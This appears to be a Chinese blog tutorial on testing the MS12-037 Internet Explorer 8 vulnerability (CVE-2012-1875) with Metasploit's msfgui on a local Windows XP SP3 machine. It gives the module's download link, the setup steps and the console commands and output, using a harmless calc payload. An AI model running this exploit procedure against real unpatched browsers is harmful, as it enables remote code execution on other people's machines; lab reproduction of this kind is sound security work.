本来想使用Metasploit的控制台来测试,但是控制台怎么也找不到这个exploit,暂不知道原因,后来使用msfgui来测试的。
1、rb文件下载地址:http://dev.metasploit.com/redmine/projects/framework/repository/revisions/6abb7bb987a11dbcda8eb611831bcb2ff65070e0/entry/modules/exploits/windows/browser/ms12_037_same_id.rb
2、把下载回来的rb文件放到C:\metasploit\msf3\modules\exploits\magictong\cve-2012-1875.rb,我改了名,放到了magictong文件夹下面,你也可以不改名,或者放到已有的文件夹下面,但是一定要放到exploits下面,你懂的。
3、在msfgui界面上,使用File菜单Search选项,搜索2012-1875,如图,不出意外应该是可以搜索到的啊!
4、选中搜到的条目,具体就是上面的magictong/cve-2012-1875 - Normal,然后点击Launch按钮,进入配置页面。
5、在配置页面,首先选择Targets,我的目标系统是xpsp3,我选择了IE 8 on Windows XP SP3 with msvcrt ROP,因为这个漏洞要过DEP,因此利用会麻烦点。
6、然后选择Payload,这里选择了exec,启动calc(计算器)。SRVHOST里面输入本机(MSF所在的机器,不是有漏洞的机器,如果有漏洞机器就是MSF所在的机器,则输入127.0.0.1即可)的局域网IP,如果直接在本机测试,输入127.0.0.1即可。
7、然后点击Run inConsole ,等待,直到msfgui的主界面下console TAB页打出如下信息:
msf exploit(cve-2012-1875) > use exploit/magictong/cve-2012-1875
msf exploit(cve-2012-1875) > set TARGET 1
TARGET => 1
msf exploit(cve-2012-1875) > set PAYLOAD windows/exec
msf exploit(cve-2012-1875) > set CMD calc
PAYLOAD => windows/exec
CMD => calc
msf exploit(cve-2012-1875) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf exploit(cve-2012-1875) > exploit
[*] Exploit running as background job.
[*] Using URL: http://127.0.0.1:8080/V6rnzyBsbnnmWIv
[*] Server started.
8、现在你就可以使用http://127.0.0.1:8080/V6rnzyBsbnnmWIv在本机进行测试了。